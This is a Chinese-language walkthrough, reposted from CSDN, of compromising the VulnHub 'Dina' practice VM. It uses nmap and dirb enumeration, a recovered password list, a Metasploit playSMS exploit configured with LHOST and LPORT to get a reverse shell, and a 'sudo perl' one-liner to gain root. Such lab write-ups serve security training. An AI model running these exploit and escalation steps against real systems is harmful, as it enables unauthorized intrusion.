自学内容网 自学内容网

Vulhub Dina靶机详解

项目地址

https://download.vulnhub.com/dina/Dina-1-0-1.ova

更该靶机MAC地址

实验过程

开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知Dina的一个ip地址为192.168.47.166

扫描Dina的操作系统,端口及对应服务

nmap -A -p- 192.168.47.166

发现开放80端口

获取信息

访问网站

没有有用信息

目录扫描

dirb http://192.168.47.166

访问robots

尝试到拼接/nothing得到一个密码本

拼接/secure得到一个压缩文件

通过kali下载解压发现需要密码

结合刚才的密码本

解压出来一段音频

打开提示这似乎是个文本文件

使用文本打开它

拼接/SecreTSMSgatwayLogin

得到一个登录界面

通过密码本尝试可知密码为diana

获取shell

发现是playSMS框架 使用kali搜索一波

searchsploit playsms

将42044.txt 复制到/home/kali

cp /usr/share/exploitdb/exploits/php/webapps/42044.txt /home/kali

查看42044.txt文件

大概意思是可以生成一个csv文件,抓包传参;文档中给出了上传的脚本和信息,可以在user-agent中执行命令;并且那么我们就可以在playsms框架上寻找到可以upload(文件上传)的地址,上传CSV文件,利用burp抓包修改参数,从而getshell

使用msf查看框架漏洞

msfconsole
search playsms

使用漏洞2并show options

use 2
show options

配置

set PASSWORD diana
set USERNAME touhid
set TARGETURI SecreTSMSgatwayLogin (TARGETURI是上传文件页面的URI)
set RHOST 192.168.47.166(靶机ip)
set LHOST 192.168.47.129(kali监听机的ip)
set LPORT 2429(kali监听的端口)
run

不能执行命令,输入shell

提权

查看可提权文件

sudo -l

通过辅助网址查找perl | GTFOBins

sudo perl -e 'exec "/bin/sh";'

执行

提权成功


原文地址:https://blog.csdn.net/weixin_62457642/article/details/142755929

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!